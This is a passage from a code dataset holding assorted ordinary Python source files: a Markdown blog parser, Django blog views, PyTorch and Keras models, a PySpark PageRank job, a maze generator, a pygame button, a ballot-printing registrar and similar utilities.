+{"seq_id":"319834506","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nBlog content file parser.\n\nSyntax::\n\n -----------------\n title: Title\n date: 2011-09-01\n folder: life\n tags: tag1, tag2\n -----------------\n\n Your content here. And it support code highlight.\n\n ```python\n\n def hello():\n return 'Hello World'\n\n ```\n\n\n:copyright: (c) 2011 by Hsiaoming Young (aka lepture)\n:license: BSD\n'''\n\n\nimport re\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.lexers import get_lexer_by_name, TextLexer\nfrom markdown import Markdown\n\nfrom liquidluck.readers import Reader\nfrom liquidluck.namespace import ns, NameSpace\nfrom liquidluck.utils import to_unicode, import_module\nfrom liquidluck import logger\n\nif ns.site.syntax == 'class':\n INLINESTYLES = False\nelse:\n INLINESTYLES = True\n\n\"\"\"\n```python\ndef yourcode():\n print('here')\n```\n\"\"\"\n\n\ndef codeblock(text):\n pattern = re.compile(r'```(\\w+)(.+?)```', re.S)\n formatter = HtmlFormatter(noclasses=INLINESTYLES)\n\n def repl(m):\n try:\n lexer = get_lexer_by_name(m.group(1))\n except ValueError:\n lexer = TextLexer()\n code = highlight(m.group(2), lexer, formatter)\n #code = code.replace('\\n\\n', '\\n \\n').replace('\\n', '
')\n return '\\n\\n%s
\\n\\n' % code\n return pattern.sub(repl, text)\n\n\nmarkdown_prefork = NameSpace({\n 'codeblock': 'liquidluck.readers.mkd.codeblock',\n 'youku': 'liquidluck.filters.youku',\n 'tudou': 'liquidluck.filters.tudou',\n 'yinyuetai': 'liquidluck.filters.yinyuetai',\n})\n\n\ndef markdown(text):\n if 'markdown_prefork' in ns.sections:\n markdown_prefork.update(ns.sections.markdown_prefork)\n\n for module in markdown_prefork.values():\n if module:\n text = import_module(module)(text)\n md = Markdown(extensions=['extra','toc'])\n return md.convert(text)\n\n\nclass MarkdownParser(object):\n def __init__(self, filepath):\n self.filepath = filepath\n\n def read(self):\n f = open(self.filepath)\n logger.info('read ' + self.filepath)\n content = f.read()\n f.close()\n\n meta_regex = re.compile(\n r\"^\\s*(?:-|=){3,}\\s*\\n((?:.|\\n)+?)\\n\\s*(?:-|=){3,}\\s*\\n*\",\n re.MULTILINE\n )\n match = re.match(meta_regex, content)\n if not match:\n logger.error(\"No metadata in: %s\" % self.filepath)\n return None\n meta = match.group(1)\n meta = re.sub(r'\\r\\n|\\r|\\n', '\\n', meta)\n dct = {}\n k = v = None\n for meta in meta.split('\\n'):\n meta = meta.replace('\\t', ' ')\n if meta.startswith(' ') and k:\n dct[k] = dct[k] + '\\n' + meta.lstrip()\n if ':' in meta and not meta.startswith(' '):\n index = meta.find(':')\n k, v = meta[:index], meta[index + 1:]\n k, v = k.rstrip(), v.lstrip()\n dct[k] = to_unicode(v)\n text = to_unicode(content[match.end():])\n dct['content'] = markdown(text)\n return dct\n\n\nclass MarkdownReader(Reader):\n def support_type(self):\n return 'md', 'mkd', 'markdown'\n\n def parse_post(self):\n if hasattr(self, 'post'):\n return self.post\n parts = MarkdownParser(self.filepath).read()\n\n post = NameSpace(parts)\n tags = post.get('tags', None)\n if tags:\n post.tags = [tag.strip() for tag in tags.split(',')]\n self.post = post\n return post\n","sub_path":"liquidluck/readers/mkd.py","file_name":"mkd.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"336245624","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Post, Comment, Image, Note, Video, Theme\nfrom django.utils import timezone\nfrom .forms import PostForm, CommentForm, ImageForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom os import path\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/post_list.html',{'posts':posts})\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\treturn render(request, 'blog/post_detail.html', {'post':post})\n@login_required\t\ndef post_new(request):\n\tif request.method == 'POST':\n\t\tform = PostForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author=request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\treturn render(request, 'blog/post_edit.html', {'form':form})\n\t\n\t\n@login_required\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == 'POST':\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author=request.user\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\treturn render(request, 'blog/post_edit.html', {'form':form})\n@login_required\ndef post_remove(request, pk):\n\tpost = get_object_or_404(Post, pk = pk)\n\tpost.delete()\n\treturn redirect('post_list')\n\ndef add_comment_to_post(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == 'POST':\n\t\tform = CommentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcomment = form.save(commit=False)\n\t\t\tcomment.post = post\n\t\t\tcomment.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = CommentForm()\n\treturn render(request,'blog/add_comment_to_post.html', {'form':form})\n\n@login_required\ndef comment_approve(request, pk):\n\tcomment = get_object_or_404(Comment, pk=pk)\n\tcomment.approve()\n\treturn redirect('post_detail',pk=comment.post.pk)\n\t\n@login_required\ndef comment_remove(request,pk):\n\tcomment = get_object_or_404(Comment, pk=pk)\n\tpost_pk = comment.post.pk\n\tcomment.delete()\n\treturn redirect('post_detail', pk=post_pk)\n\t# Create your views here.\n\ndef image_view(request): \n\timages = Image.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/image_gallery.html', {'images':images})\n\n@login_required\ndef image_new(request):\n\tif request.method == 'POST':\n\t\tform = ImageForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\timage = form.save(commit=False)\n\t\t\timage.user = request.user\n\t\t\timage.folder_upload = path.join('blog',image.user.username,'images')\n\t\t\timage.published_date = timezone.now()\n\t\t\timage.save()\n\t\t\treturn redirect('image_view')\n\t\t\t\n\telse:\n\t\tform = ImageForm()\n\treturn render(request, 'blog/image_edit.html', {'form':form})\n\n\ndef video_view(request):\n\tvideos = Video.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n\treturn render(request, 'blog/video_gallery.html', {'videos':videos})\n\t\ndef category(request,slug):\n\tcategory = Theme.objects.get(slug=slug)\n\tpost = Post.objects.filter(category=category)\n\tpaginator = Paginator(post, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpost = paginator.page(page)\n\texcept EmptyPage:\n\t\tpost = paginator.page(paginator.num_pages)\n\texcept PageNotAnInteger:\n\t\tpost = paginator.page(1)\n\treturn render(request, 'category_list.html', {\n\t'category':category, 'page':page, 'post':post})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"112301803","text":"import torch\nimport torch.nn as nn\nfrom ipdb import set_trace as pdb\n\n\nclass simpleNet(nn.Module):\n def __init__(self, hidden_size):\n super(simpleNet, self).__init__()\n\n self.in1 = nn.Linear(11, hidden_size)\n self.out1 = nn.Linear(hidden_size, 3)\n\n self.in2 = nn.Linear(14, hidden_size)\n self.out2 = nn.Linear(hidden_size, 2)\n\n self.dropout = nn.Dropout(p=0.1)\n self.BN = nn.BatchNorm1d(hidden_size)\n\n def forward(self, x):\n missing = torch.relu(self.in1(x))\n # missing = self.dropout(missing)\n missing = self.out1(missing)\n y = torch.cat((x, missing), dim=1)\n\n y = torch.relu(self.in2(y))\n y = self.BN(y)\n # y = self.dropout(y)\n y = self.out2(y)\n y = torch.sigmoid(y)\n return missing, y\n\n def freeze_stage1_param(self):\n for param in self.in1.parameters():\n param.requires_grad = False\n for param in self.out1.parameters():\n param.requires_grad = False\n","sub_path":"task2/src/baseline2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"641754615","text":"\"\"\"Registrador del modulo sufragio.\n\nSe encarga de manejar el almacenamiento e impresion de las BUE.\n\"\"\"\nfrom gi.repository.GObject import timeout_add\n\n\nclass Registrador(object):\n\n \"\"\"La clase que maneja el registro en la boleta.\n Por \"registrar\" entendemos imprimir + guardar el chip.\n \"\"\"\n\n def __init__(self, callback, modulo, callback_error):\n \"\"\"Constructor del registrador de boletas.\"\"\"\n self.callback = callback\n self.modulo = modulo\n self.callback_error = callback_error\n\n self._evento_ya_lanzado = False\n self.seleccion = None\n\n def _registrar_voto(self, solo_impimir=False):\n \"\"\"La funcion que explicitamente manda a registrar el voto.\"\"\"\n logger = self.modulo.sesion.logger\n logger.info(\"Registrando voto.\")\n fallo = False\n impresora = self.modulo.sesion.impresora\n\n def fin_de_la_impresion(estado=None):\n \"\"\"Callback que se llama cuando se terminó de imprimir una BUE.\"\"\"\n logger.info(\"Terminó de imprimir.\")\n if not self._evento_ya_lanzado:\n logger.info(\"Rehookeando eventos.\")\n self._evento_ya_lanzado = True\n impresora.remover_insertando_papel()\n rampa = self.modulo.rampa\n rampa.tiene_papel = False\n impresora.registrar_insertando_papel(rampa.cambio_sensor_2)\n if not fallo:\n logger.info(\"Llamando al callback post impresión.\")\n self.callback()\n return False\n\n self._evento_ya_lanzado = False\n # hookeo el evento, pero tambien agrego un timeout para asegurarme de\n # que si por alguna razón no salta el evento de fin de impresión sigue\n # su curso y asume que la sesion de impresión terminó. El manejo del\n # error de esto se hace mas abajo y es syncronico, a diferencia de\n # esto que es asincronico.\n if impresora is not None:\n impresora.remover_insertando_papel()\n impresora.registrar_insertando_papel(fin_de_la_impresion)\n timeout_add(10000, fin_de_la_impresion)\n\n logger.info(\"Enviando comando de impresion.\")\n self.seleccion.serial = \\\n bytes(self.modulo.rampa.datos_tag['serial'], \"utf8\")\n respuesta = impresora.registrar(self.seleccion, solo_impimir)\n logger.info(\"Fin del registro.\")\n if respuesta['status'] == \"TAG_NO_GUARDADO\":\n logger.error(\"Recibido el mensaje de tag no guardado.\")\n fallo = True\n self.callback_error()\n else:\n fallo = True\n self.callback_error()\n\n def _prepara_impresion(self, seleccion):\n \"\"\"Guarda la seleccion en el objeto registrador.\"\"\"\n self.seleccion = seleccion\n","sub_path":"msa/modulos/sufragio/registrador.py","file_name":"registrador.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"502679022","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom constants import const\nimport h5py\nimport sys\n\n\ndef pltmap(H, pcA, pcB):\n\n C = const()\n\n fig = plt.figure(figsize=[7.5, 5])\n ax = fig.add_subplot(111)\n\n \"\"\"define the colors of interest\"\"\"\n n_col = len(C['sid'])\n clis = np.linspace(0, 1, n_col)\n colormat = cm.rainbow(clis)\n markermat = ['o', 'v', 'p',\n 's', '>', 'P',\n '*', '<', 'X',\n 'D', 'd', '^']\n sizemat = [7, 7, 7,\n 6, 7, 8,\n 11, 7, 8,\n 6, 7, 7]\n\n f_red = h5py.File(\"spatial_reduced_L%s.hdf5\" % H, 'r')\n\n \"\"\"plot SVE sets for cal\"\"\"\n\n for ii in xrange(len(C['sid'])):\n\n sid = C['sid'][ii]\n name = C['names_plt'][ii]\n\n reduced = f_red.get('reduced_%s' % sid)[...]\n meanA = reduced[:, pcA].mean()\n meanB = reduced[:, pcB].mean()\n\n plt.text(meanA, meanB+8, name,\n horizontalalignment='center',\n verticalalignment='center',\n fontsize=20,\n weight='semibold',\n color=[0.15, 0.15, 0.15],\n alpha=0.99)\n\n # mfc = np.zeros((4,))\n # mfc[:3] = 0.999*colormat[ii, :3]\n # mfc[3] = 0.2 # marker face alpha\n\n # mec = np.zeros((4,))\n # mec[:3] = 0.7*colormat[ii, :3]\n # mec[3] = 0.8 # marker edge alpha\n\n mfc = np.zeros((4,))\n mfc[:3] = colormat[ii, :3] + .3*(1-colormat[ii, :3])\n mfc[3] = 1 # marker face alpha\n\n mec = np.zeros((4,))\n mec[:3] = 0.7*colormat[ii, :3]\n mec[3] = 1 # marker edge alpha\n\n plt.plot(reduced[:, pcA], reduced[:, pcB],\n marker=markermat[ii], markersize=sizemat[ii],\n mfc=mfc, mec=mec,\n linestyle='', label=C['names_plt'][ii])\n\n # plt.plot(reduced[:, pcA], reduced[:, pcB],\n # marker='o', markersize=6, color=colormat[ii, :],\n # alpha=0.2, linestyle='')\n # plt.plot(meanA, meanB,\n # marker='D', markersize=8, color=colormat[ii, :],\n # linestyle='')\n\n # varmat = np.var(reduced, axis=0)\n # msg = \"total variance for %s: %s\" % (sid, varmat.sum())\n # rr.WP(msg, C['wrt_file'])\n\n plt.margins(.1)\n\n # plt.xlabel(\"PC%s\" % str(pcA+1))\n # plt.ylabel(\"PC%s\" % str(pcB+1))\n plt.xlabel(\"PC%s\" % str(pcA+1), fontsize='large')\n plt.ylabel(\"PC%s\" % str(pcB+1), fontsize='large')\n plt.xticks(fontsize='large')\n plt.yticks(fontsize='large')\n\n plt.grid(linestyle='-', alpha=0.15)\n\n gr = 1.00\n ax.patch.set_facecolor([gr, gr, gr])\n\n fig.tight_layout()\n\n f_red.close()\n\n fig_name = 'pc%s_pc%s_L%s.png' % (pcA+1, pcB+1, H)\n fig.canvas.set_window_title(fig_name)\n plt.savefig(fig_name)\n\n\nif __name__ == '__main__':\n H = np.int64(sys.argv[1])\n pcA = np.int64(sys.argv[2])\n pcB = np.int64(sys.argv[3])\n\n pltmap(H, pcA, pcB)\n\n plt.show()\n","sub_path":"fip_collab/2017_02_24_HCF_pearson/plot_pc_map.py","file_name":"plot_pc_map.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"448618732","text":"from distutils.core import setup, Extension\nimport numpy as np\n\nmodule1 = Extension(\n \"dmp\",\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n include_dirs=[np.get_include()],\n sources=[\"src/dmp.cpp\"],\n)\n\nsetup(\n name=\"dmp\",\n version=\"1.0\",\n description=\"dmp package\",\n ext_modules=[module1],\n)\n","sub_path":"bindings/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"142581654","text":"import sys\nimport re\nfrom pyspark.sql import SparkSession\nfrom operator import add\n\ndef computeContribs(urls, rank):\n \"\"\"Calculates URL contributions to the rank of other URLs.\"\"\"\n num_urls = len(urls)\n for url in urls:\n yield (url, rank / num_urls)\n\n\ndef parseNeighbors(urls):\n \"\"\"Parses a urls pair string into urls pair.\"\"\"\n parts = re.split(r'\\s+', urls)\n return parts[0], parts[1]\n\nspark = SparkSession\\\n\t.builder\\\n\t.appName(\"part3\")\\\n\t.config(\"spark.driver.memory\", \"8g\")\\\n\t.config(\"spark.executor.memory\", \"8g\")\\\n\t.config(\"spark.executor.cores\", \"5\")\\\n\t.config(\"spark.task.cpus\", \"1\")\\\n\t.getOrCreate()\n\ntxt = spark.read.text(sys.argv[2]).rdd.map(lambda r: r[0])\nrows = txt.filter(lambda line: line[0]!=\"#\")\n\nlinks = rows.map(lambda urls: parseNeighbors(urls)).distinct().groupByKey().partitionBy(int(sys.argv[1]))\nranks = links.map(lambda url_neighbors: (url_neighbors[0], 1.0)).partitionBy(int(sys.argv[1]))\n\nfor ite in range(10):\n\tcontributions = links.join(ranks).flatMap(\n lambda url_urls_rank: computeContribs(url_urls_rank[1][0], url_urls_rank[1][1]))\n\tranks = contributions.reduceByKey(add).mapValues(lambda rank: rank * 0.85 + 0.15)\n\nite=0\nfor (link,rank) in ranks.collect():\n\tprint(\"%s has rank: %s\" %(link,rank))\n\tite+=1\n\tif ite==5:\n\t\tbreak\n\n","sub_path":"assignment1/code/part3/task2/small_data/part3_t2_small.py","file_name":"part3_t2_small.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"189943276","text":"import pygame.font #加载和表示文本模块\n\nclass Button():\n '''按键控件'''\n def __init__(self,screen,msg): #??ai_settings self,ai_settings,screen,msg\n '''控件初始化属性'''\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n #具体尺寸等\n self.width,self.height = 459,90 #这里创建的框小了,实际文字自带底色就会超出边界\n self.button_color = (135,135,135) #灰色\n self.text_color = (255,255,255) #白色\n self.font = pygame.font.Font('font/pingfang.ttf',48) #试了几个常用字体,就苹方能正常显示中文;若pygame.font.SysFont(None,48) None默认系统字体(不支持中文),48号;\n\n #创建按钮的rect对象,并使其居中\n self.rect = pygame.Rect(0,0,self.width,self.height) #参数为左上角坐标xy,及宽高\n self.rect.center = self.screen_rect.center #屏幕内居中\n\n #按钮标签只需创建一次\n self.prep_msg(msg)\n\n def prep_msg(self,msg):\n '''将字符串 msg渲染为图像,并使其在按钮上居中'''\n #pygame.font.font.render(字符串,抗锯齿True/False,字体颜色RGB元组,<可选>背景色)\n self.msg_image = self.font.render(msg,True,self.text_color,\n self.button_color) #转化为surface\n self.msg_image_rect = self.msg_image.get_rect() #获取文字层对应的surface的rect属性\n self.msg_image_rect.center = self.rect.center #居中对齐建立的buttonrect对象\n\n def draw_button(self):\n '''绘制按钮'''\n self.screen.fill(self.button_color,self.rect) #填充设置的按钮rect\n self.screen.blit(self.msg_image,self.msg_image_rect) #在 文字层对应的surface的rect上绘制msg\n\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"214376247","text":"def reverse(num):\n rev = 0\n while (num > 0):\n rev = rev * 10 + num % 10\n num = num // 10\n\n return rev\n\n\n# Function that returns true\n# if num is palindrome\ndef isPalindrome(num):\n # If the number is equal to the\n # reverse of it then it\n # is a palindrome\n if (num == reverse(num)):\n return True\n\n return False\n\n\n# Function to prall the\n# d-digit palindrome numbers\ndef printPalindromes(d):\n if (d <= 0):\n return\n\n # Smallest and the largest d-digit numbers\n smallest = pow(10, d - 1)\n largest = pow(10, d) - 1\n\n # Starting from the smallest d-digit\n # number till the largest\n for i in range(smallest, largest + 1):\n\n # If the current number\n # is palindrome\n if (isPalindrome(i)):\n print(i, end=\" \")\n\n # Driver code\n\n\nd = 8\nprintPalindromes(d)","sub_path":"CodeChef/aug_cookoff_2nd.py","file_name":"aug_cookoff_2nd.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"24570254","text":"'''\nSimple maze generator\n'''\n\nimport numpy\nfrom numpy.random import random_integers as rand\n\n\ndef maze(width=10, height=10, complexity=.75, density=.75):\n # Only odd shapes\n width = width + 1\n height = height + 1\n shape = ((height // 2) * 2 + 1, (width // 2) * 2 + 1)\n # Adjust complexity and density relative to maze size\n complexity = int(complexity * (5 * (shape[0] + shape[1])))\n density = int(density * ((shape[0] // 2) * (shape[1] // 2)))\n # Build actual maze\n Z = numpy.zeros(shape, dtype=bool)\n # Fill borders\n Z[0, :] = Z[-1, :] = 1\n Z[:, 0] = Z[:, -1] = 1\n # Make aisles\n for i in range(density):\n x, y = rand(0, shape[1] // 2) * 2, rand(0, shape[0] // 2) * 2\n Z[y, x] = 1\n for j in range(complexity):\n neighbours = []\n if x > 1:\n neighbours.append((y, x - 2))\n if x < shape[1] - 2:\n neighbours.append((y, x + 2))\n if y > 1:\n neighbours.append((y - 2, x))\n if y < shape[0] - 2:\n neighbours.append((y + 2, x))\n if len(neighbours):\n y_,x_ = neighbours[rand(0, len(neighbours) - 1)]\n if Z[y_, x_] == 0:\n Z[y_, x_] = 1\n Z[y_ + (y - y_) // 2, x_ + (x - x_) // 2] = 1\n x, y = x_, y_\n # convert to maze.py format\n ret = [[0 for x in range(len(Z[0]) - 2)] for y in range(len(Z) - 2)]\n for i in range(len(Z)):\n for j in range(len(Z[0])):\n if i > 0 and j > 0 and i < len(Z) - 1 and j < len(Z[0]) - 1:\n if Z[i][j] == 1:\n ret[i - 1][j - 1] = [0, 0, 0]\n else:\n ret[i - 1][j - 1] = [255, 255, 255]\n if i == 1 and j == 1:\n ret[i - 1][j - 1] = [0, 0, 255]\n if i == len(Z) - 2 and j == len(Z[0]) - 2:\n ret[i - 1][j - 1] = [255, 0, 0]\n return ret\n","sub_path":"HW02/kuimaze/map_generator.py","file_name":"map_generator.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"31060360","text":"import string\n#import sys\n#import inspect\n#import operator\nfrom .Transaction import Transaction\nfrom JumpScale import j\n\nclass TransactionController(object):\n '''\n Manager controlling actions\n Transactions = jumpscale transactions\n see #@todo doc on jumpscale\n @property transactions: array of transactions \n @property width: Maximum width of output\n @property maxloglevel : max loglevel which will be captured (default for all transactions)\n for more info see: http://www.jumpscale.org/display/PM/Transactions\n '''\n def __init__(self):\n self.activeTransaction=None\n self.transactions=[] #list of transactions\n self.maxloglevel=5\n self.send2console=True\n def hide(self,maxloglevel, callback, callbackparams):\n self.start(\"hide\", \"\", \"\", maxloglevel, callback, callbackparams,noOutput=True)\n\n def start(self, description, errormessage=None, resolutionmessage=None,maxloglevel=2,maxloglevelcapture=5,\\\n callback=None,callbackparams=None,silent=False):\n '''Start a new transaction and return the transaction\n\n @param description: Description of the transaction\n @param errormessage: Error message displayed to the user when the transaction fails\n @param resolutionmessage: Resolution message displayed to the user when the transaction fails\n @param maxloglevel specify which logs with max level should be remembered when doing the transaction\n @param callback can use this to provide a sort of rollback mechanism to e.g. cleanup a state\n @param callbackparams dict of parameters\n\n '''\n #j.logger.log('Starting transaction: %s' % description,5)\n if self.hasRunningTransactions()==False:\n self.originalwidth=j.console.width\n \n transaction = Transaction(description, errormessage, resolutionmessage,\\\n maxloglevel=maxloglevel,maxloglevelcapture=maxloglevelcapture,\\\n callback=callback,callbackparams=callbackparams,silent=silent)\n \n self.transactions.append(transaction)\n self.activeTransaction=transaction\n\n \n #msg=\"TRANSACTION START: %s\" % transaction.description\n msg=\"%s\" % transaction.description\n if self.send2console and silent==False:\n j.console.echoListItem(msg)\n else:\n j.logger.log(msg,5)\n if silent==False:\n j.console.indent+=1 \n\n def stop(self,failed=False):\n '''\n Stop the currently running transaction\n\n This will get the latest started transaction from the transaction stack and\n display status\n @param failed, used when error is raised by errorconditionhanlder\n '''\n if not self.transactions:\n raise RuntimeError('[ACTIONS] Stop called while no transactionsactions are '\n 'running at all')\n \n transaction = self.transactions.pop()\n #_TransactionStatus=j.enumerators.TransactionStatus\n #status = _TransactionStatus.DONE if not failed else _TransactionStatus.FAILED\n status=2\n if not failed and not self.transactions:\n #status = _TransactionStatus.FINISHED\n status=1\n if transaction.silent==False:\n j.console.indent-=1 \n #if status==_TransactionStatus.FINISHED:\n if status==1:\n msg=\"TRANSACTION %s: %s\" % (string.upper(str(status)),transaction.description)\n self.activeTransaction=None\n else:\n msg=\"TRANSACTION %s: %s\" % (string.upper(str(status)),transaction.description)\n #if self.send2console:\n #j.console.echoListItem(msg)\n #else:\n j.logger.log(msg,5)\n \n def stopall(self):\n \"\"\"\n stop all transaction\n \"\"\"\n for tr in self.transactions:\n self.stop()\n\n def clean(self):\n '''Clean the list of running actions'''\n j.logger.log('[ACTIONS] Clearing all actions', 5)\n self.transactions = list()\n\n\n def hasRunningTransactions(self):\n '''\n Check whether actions are currently running\n @returns: Whether actions are runnin\n '''\n return bool(self.transactions)\n\n","sub_path":"lib/JumpScale/baselib/actionsold/transaction/TransactionController.py","file_name":"TransactionController.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"455001261","text":"\n# coding: utf-8\n\n# In[3]:\n\nimport pickle\nimport numpy as np\nimport string\nimport sys\nimport h5py \nimport keras.backend as K \nfrom keras import regularizers\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout,BatchNormalization\nfrom keras.layers import GRU,LSTM\nfrom keras.layers.embeddings import Embedding\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\ntest_path = sys.argv[1]\noutput_path = sys.argv[2]\n\n#####################\n### parameter ###\n#####################\nsplit_ratio = 0.1\nembedding_dim = 100\nnb_epoch = 1000\nbatch_size = 128\n\n\n################\n### Util ###\n################\ndef read_data(path,training):\n print ('Reading data from ',path)\n with open(path,'r',encoding = 'ISO-8859-1') as f:\n \n tags = []\n articles = []\n tags_list = []\n \n f.readline()\n for line in f:\n if training :\n start = line.find('\\\"')\n end = line.find('\\\"',start+1)\n tag = line[start+1:end].split(' ')\n article = line[end+2:]\n \n for t in tag :\n if t not in tags_list:\n tags_list.append(t)\n \n tags.append(tag)\n else:\n start = line.find(',')\n article = line[start+1:]\n \n articles.append(article)\n \n if training :\n assert len(tags_list) == 38,(len(tags_list))\n assert len(tags) == len(articles)\n return (tags,articles,tags_list)\n\ndef get_embedding_dict(path):\n embedding_dict = {}\n with open(path,'r',encoding = 'utf8') as f:\n for line in f:\n values = line.split(' ')\n word = values[0]\n coefs = np.asarray(values[1:],dtype='float32')\n embedding_dict[word] = coefs\n return embedding_dict\n\ndef get_embedding_matrix(word_index,embedding_dict,num_words,embedding_dim):\n embedding_matrix = np.zeros((num_words,embedding_dim))\n for word, i in word_index.items():\n if i < num_words:\n embedding_vector = embedding_dict.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n return embedding_matrix\n\ndef to_multi_categorical(tags,tags_list): \n tags_num = len(tags)\n tags_class = len(tags_list)\n Y_data = np.zeros((tags_num,tags_class),dtype = 'float32')\n for i in range(tags_num):\n for tag in tags[i] :\n Y_data[i][tags_list.index(tag)]=1\n assert np.sum(Y_data) > 0\n return Y_data\n\ndef split_data(X,Y,split_ratio):\n indices = np.arange(X.shape[0]) \n np.random.shuffle(indices) \n \n X_data = X[indices]\n Y_data = Y[indices]\n \n num_validation_sample = int(split_ratio * X_data.shape[0] )\n \n X_train = X_data[num_validation_sample:]\n Y_train = Y_data[num_validation_sample:]\n\n X_val = X_data[:num_validation_sample]\n Y_val = Y_data[:num_validation_sample]\n\n return (X_train,Y_train),(X_val,Y_val)\n\ndef create_model(num_words,embedding_dim,embedding_matrix,max_article_length):\n model = Sequential()\n model.add(Embedding(num_words,\n embedding_dim,\n weights=[embedding_matrix],\n input_length=max_article_length,\n trainable=False))\n model.add(GRU(256,activation='tanh', \n recurrent_initializer = 'orthogonal',\n bias_initializer='ones',\n recurrent_dropout=0.1,\n dropout=0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(256,activation='relu'))\n model.add(Dropout(0.1))\n model.add(Dense(38,activation='sigmoid'))\n model.summary()\n return model\n\n \n###########################\n### custom metrices ###\n###########################\ndef f1_score(y_true,y_pred):\n thresh = 0.5\n y_pred = K.cast(K.greater(y_pred,thresh),dtype='float32')\n tp = K.sum(y_true * y_pred,axis=-1)\n \n precision=tp/(K.sum(y_pred,axis=-1)+K.epsilon())\n recall=tp/(K.sum(y_true,axis=-1)+K.epsilon())\n return K.mean(2*((precision*recall)/(precision+recall+K.epsilon())))\n\n(_, X_test,_) = read_data(test_path,False)\n\nwith open('max_article_length.pkl','rb') as mal:\n max_article_length = pickle.load(mal)\nwith open('label_mapping.pkl','rb') as lm:\n tag_list = pickle.load(lm)\nwith open('word_index.pkl','rb') as wi:\n word_index = pickle.load(wi)\n\ntokenizer = Tokenizer()\n### convert word sequences to index sequence\nprint ('Convert to index sequences.')\ntokenizer.word_index = word_index\ntest_sequences = tokenizer.texts_to_sequences(X_test) \n\n### padding to equal length\nprint ('Padding sequences.')\n#train_sequences = pad_sequences(train_sequences)\n#max_article_length = train_sequences.shape[1]\ntest_sequences = pad_sequences(test_sequences,maxlen=max_article_length)\n \nprint ('Get embedding dict from glove.')\nembedding_dict = get_embedding_dict('glove.6B.%dd.txt'%embedding_dim)\nprint ('Found %s word vectors.' % len(embedding_dict))\nnum_words = len(word_index) + 1\nprint ('Create embedding matrix.')\nembedding_matrix = get_embedding_matrix(word_index,embedding_dict,num_words,embedding_dim)\n\nmodel2 = create_model(num_words,embedding_dim,embedding_matrix,max_article_length)\nmodel2.load_weights('rnn.hdf5')\nY_pred = model2.predict(test_sequences)\n \nthresh = 0.5\nwith open(output_path,'w') as output:\n print ('\\\"id\\\",\\\"tags\\\"',file=output)\n Y_pred_thresh = (Y_pred > thresh).astype('int')\n for index,labels in enumerate(Y_pred_thresh):\n labels = [tag_list[i] for i,value in enumerate(labels) if value==1 ]\n labels_original = ' '.join(labels)\n print ('\\\"%d\\\",\\\"%s\\\"'%(index,labels_original),file=output)\n\n\n# In[ 